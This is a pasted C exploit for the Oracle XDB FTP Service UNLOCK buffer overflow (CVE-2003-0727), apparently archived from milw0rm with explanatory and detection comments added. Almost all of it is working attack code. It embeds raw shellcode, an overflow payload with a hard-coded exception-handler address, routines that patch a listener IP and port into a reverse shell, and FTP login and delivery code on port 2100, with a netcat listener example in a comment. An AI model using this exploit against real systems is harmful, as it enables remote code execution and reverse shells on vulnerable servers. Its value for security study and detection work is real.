
Oracle XDB FTP Service - UNLOCK Buffer Overflow - CVE-2003-0727

  1. /*  Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
  2. /*    David Litchfield from ngssoftware (at Blackhat 2003)*/
  3. /*                                                        */
  4. /*  Original Advisory :                                   */
  5. /*  http://www.blackhat.com/presentations/bh-usa-03/bh-   */
  6. /*  us-03-litchfield-paper.pdf                            */
  7.  
  8.  
  9. #include <stdio.h>
  10. #include <windows.h>
  11. #include <winsock.h>
  12.  
/* Forward declarations for the three phases below: Winsock startup,
 * patching the listener address into the payload, and the FTP session
 * that delivers it. */
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);

/* File-scope state shared between StartWinsock() and GainControlOfOracle():
 * s_sa is the target address (port is filled in by GainControlOfOracle),
 * he/addr hold the resolution result, and host is the target name copied
 * from argv[1] in main(). Being globals they are zero-initialized, which is
 * what keeps host[] NUL-terminated after the 250-byte strncpy in main(). */
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";

  22. unsigned char exploit[508]=
  23. "\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
  24. "\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
  25. "\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
  26. "\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
  27. "\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
  28. "\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
  29. "\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
  30. "\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
  31. "\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
  32. "\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
  33. "\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
  34. "\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
  35. "\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
  36. "\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
  37. "\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
  38. "\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
  39. "\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
  40. "\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
  41. "\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
  42. "\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
  43. "\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
  44. "\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
  45. "\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
  46. "\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
  47. "\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
  48. "\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
  49. "\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
  50. "\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
  51. "\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
  52. "\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
  53. "\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
  54. "\xFF\xFF\xFF\xFF";
  55.  
/* The FTP request that triggers the overflow: an UNLOCK command whose
 * argument is a long filler pattern. main() appends short_jump,
 * exception_handler, the shellcode and a CRLF after this static text, so the
 * buffer is sized well above it. From a detection standpoint, an UNLOCK whose
 * argument runs to several hundred bytes or more on the XDB FTP port is the
 * on-wire signature of this attack. */
char exploit_code[8000]=
"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
"1aaaabbbbcc";


/* Two 4-byte values that main() appends right after the filler. Each is
 * declared with 8 bytes so the trailing NUL is present for strcat().
 * exception_handler is a fixed absolute address (presumably the value that
 * lands on the overwritten exception-handler record — TODO confirm which
 * module it points into); because it is hard-coded, the exploit only works
 * against one specific OS/DLL build, which is exactly what address-space
 * randomization breaks. short_jump is an x86 short jump (EB 06) padded with
 * two NOPs (90). */
char exception_handler[8]="\x79\x9B\xf7\x77";
char short_jump[8]="\xEB\x06\x90\x90";

  67.  
  68.  
/* Entry point. Expects exactly five arguments: target host, FTP user, FTP
 * password, and the IP address and port of the listener the payload connects
 * back to (the usage text describes this as a reverse shell). Assembles the
 * full request in exploit_code (filler + short_jump + exception_handler +
 * shellcode + CRLF) and hands off to GainControlOfOracle().
 * Returns 0 on usage or normal completion; on Winsock failure it returns the
 * character count from printf(), i.e. some non-zero value. argv[5] is parsed
 * with atoi() and is not range-checked. */
int main(int argc, char *argv[])
{
    if(argc != 6)
    {
        printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
        printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
        printf("\n\n\tSpawns a reverse shell to specified port");
        printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
        printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)");
        printf("\n\t6th July 2003\n\n\n");
        return 0;
    }
    /* Bounded copy into host[260]; the tail stays NUL because host is a
     * zero-initialized global, so strncpy's non-termination does not bite. */
    strncpy(host,argv[1],250);
    if(StartWinsock()==0)
        return printf("Error starting Winsock.\n");
    /* Patch the listener address into the shellcode before it is appended. */
    SetUpExploit(argv[4],atoi(argv[5]));
    strcat(exploit_code,short_jump);
    strcat(exploit_code,exception_handler);
    strcat(exploit_code,exploit);
    strcat(exploit_code,"\r\n");


    GainControlOfOracle(argv[2],argv[3]);
    return 0;
}
  94.  
  95.  
/* Patches the listener address into the shellcode array in place.
 * myip   - dotted-quad IPv4 address the payload connects back to
 * myport - TCP port the listener waits on
 * The four address bytes are written to exploit[191..194] and the two port
 * bytes to exploit[209..210], byte-wise from the in-memory representation.
 * Always returns 0; the result of inet_addr() is not validated. */
int SetUpExploit(char *myip, int myport)
{
    unsigned int ip=0;
    unsigned short prt=0;
    char *ipt="";
    char *prtt="";


    ip = inet_addr(myip);
    ipt = (char*)&ip;   /* char view of the 4 address bytes, in network order */
    exploit[191]=ipt[0];
    exploit[192]=ipt[1];
    exploit[193]=ipt[2];
    exploit[194]=ipt[3];
    // set the TCP port to connect on
    // netcat should be listening on this port
    // e.g. nc -l -p 80

    prt = htons((unsigned short)myport);
    /* The port is stored bit-inverted. Presumably the shellcode undoes this so
     * that a port containing a zero byte never embeds a NUL (which strcat() in
     * main() would stop at) — TODO confirm against the shellcode. */
    prt = prt ^ 0xFFFF;
    prtt = (char *) &prt;
    exploit[209]=prtt[0];
    exploit[210]=prtt[1];
    return 0;
}
  121.  
  122.  
/* Initializes Winsock 2.0 and resolves the global host into s_sa.
 * Returns 1 on success, 0 when WSAStartup fails, when the negotiated version
 * is not 2.0, or when he ends up NULL. Note that in the name branch the
 * gethostbyname() result is dereferenced before the NULL check at the end,
 * so an unresolvable name crashes here instead of returning 0. isalpha() is
 * given a plain char; a first byte >= 0x80 would need an unsigned char cast
 * to be well-defined. */
int StartWinsock() {
    int err=0; WORD wVersionRequested;
    WSADATA wsaData;
    wVersionRequested = MAKEWORD( 2, 0 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 )
        return 0;

    if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
    { WSACleanup( );
        return 0; }


    /* Hostname vs. dotted-quad is decided by the first character only. */
    if (isalpha(host[0])) {
        he = gethostbyname(host);
        s_sa.sin_addr.s_addr=INADDR_ANY;
        s_sa.sin_family=AF_INET;
        memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);   /* he not yet NULL-checked */
    } else
    { addr = inet_addr(host);
        s_sa.sin_addr.s_addr=INADDR_ANY;
        s_sa.sin_family=AF_INET;
        memcpy(&s_sa.sin_addr,&addr,4);
        he = (struct hostent *)1;   /* non-NULL sentinel so the check below passes */
    }
    if (he == NULL) {
        return 0; }
    return 1; }
  151.  
  152.  
/* Drives the FTP conversation on the XDB FTP port (2100): reads the banner,
 * sends USER and PASS, then sends the UNLOCK request built in exploit_code.
 * Valid credentials are required — a reply to PASS starting with '5' aborts —
 * so this is a post-authentication bug.
 * user/pass are each truncated to 230 bytes before CRLF is appended.
 * Returns 0 after the payload is sent, or the printf() count (non-zero) on
 * socket, connect or login failure.
 * Caveats visible in the code: every recv() result is stored in rcv but never
 * examined, so a closed connection or an overlong reply goes unnoticed; resp
 * only stays NUL-terminated for printf("%s") because reads are capped at 1500
 * of its 1600 zeroed bytes; r_addr is populated but never used (no bind()).
 * Detection note: an authenticated session on 2100 followed by a UNLOCK whose
 * argument is several KB long is the observable behavior. */
int GainControlOfOracle(char *user, char *pass) {
    char usercmd[260]="user ";
    char passcmd[260]="pass ";
    char resp[1600]="";
    int snd=0,rcv=0;
    struct sockaddr_in r_addr;
    SOCKET sock;


    strncat(usercmd,user,230);
    strcat(usercmd,"\r\n");
    strncat(passcmd,pass,230);
    strcat(passcmd,"\r\n");


    sock=socket(AF_INET,SOCK_STREAM,0);
    if (sock==INVALID_SOCKET)
        return printf(" sock error");
    r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY;
    r_addr.sin_port=htons((unsigned short)0);

    s_sa.sin_port=htons((unsigned short)2100);   /* Oracle XDB FTP listener */
    if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error");
    rcv = recv(sock,resp,1500,0);   /* server banner */
    printf("%s",resp);
    ZeroMemory(resp,1600);
    snd=send(sock, usercmd , strlen(usercmd) , 0);
    rcv = recv(sock,resp,1500,0);
    printf("%s",resp); ZeroMemory(resp,1600);


    snd=send(sock, passcmd , strlen(passcmd) , 0);
    rcv = recv(sock,resp,1500,0);
    printf("%s",resp);
    /* FTP permanent-negative replies begin with '5'. */
    if(resp[0]=='5')
    { closesocket(sock);
        return printf("Failed to log in using user %s and password %s.\n",user,pass);
    }
    ZeroMemory(resp,1600);
    /* Deliver the oversized UNLOCK; no reply is read, the socket is merely
     * held open briefly before closing. */
    snd=send(sock, exploit_code, strlen(exploit_code) , 0);
    Sleep(2000);
    closesocket(sock);
    return 0;
}
  197.  
  198. // milw0rm.com [2003-08-13]
  199.            
Add Comment
Please, Sign In to add comment